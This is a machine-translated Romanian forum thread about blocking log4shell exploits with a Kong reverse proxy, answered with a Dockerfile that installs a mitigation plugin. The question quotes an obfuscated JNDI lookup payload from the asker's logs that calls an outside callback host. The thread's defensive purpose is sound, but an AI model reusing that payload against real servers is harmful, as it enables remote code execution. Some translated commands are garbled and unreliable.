înregistrare Logare
Puncte:1
avatar Server

Utilizați proxy inversă Kong pentru a filtra exploit-urile log4j

drapel pg
dsteinkopf

Eu folosesc un proxy invers Kong să proxy fiecare cerere HTTP pentru serverele mele web. Aș dori să atenuez problema actuală log4j ("log4shell") prin găsirea și înlocuirea șirurilor de atașare critice precum "jndi". De exemplu, am găsit asta în jurnalele mele:

${jndi:${lower:l}${lower:d}a${lower:p}://xxx.log4j.bin${upper:a}xxx.xx:80/callback}

Cred că acest lucru ar putea fi realizat folosind solicitați pluginul de transformator. A făcut cineva deja asta?

P.S. Doar înlocuind jndi de dezactivat are o anvergură prea mare și sparge o mulțime de lucruri.

585
0 + 0
Puncte:2
avatar Server
drapel pg
dsteinkopf

Băieții de la Kong au trimis recent un postare pe blog asta imi raspunde la intrebare. Au dezvoltat o plugin Kong care atenuează exploatarea.

Am adăugat acest plugin la kong-ul meu schimbându-mi fișierul Docker:

DIN Kong: 2.6
...
rădăcină UTILIZATOR
...
# atenuare log4shell
# vezi https://konghq.com/blog/log4j-log4shell/
RUN git clone https://github.com/brentos/kong-plugin-log4shell && \
    cd kong-plugin-log4shell && \
    luarocks fac
...
ENV KONG_PLUGINS ...,log4shell
...
USER kong

Apoi tocmai am adăugat acest log4shell ca plugin global.

0 + 0
drapel romania
SEF 777
întrebarea această in alte limbi:

Postează un răspuns

Majoritatea oamenilor nu înțeleg că a pune multe întrebări deblochează învățarea și îmbunătățește legătura interpersonală. În studiile lui Alison, de exemplu, deși oamenii își puteau aminti cu exactitate câte întrebări au fost puse în conversațiile lor, ei nu au intuit legătura dintre întrebări și apreciere. În patru studii, în care participanții au fost implicați în conversații ei înșiși sau au citit transcrieri ale conversațiilor altora, oamenii au avut tendința să nu realizeze că întrebarea ar influența – sau ar fi influențat – nivelul de prietenie dintre conversatori.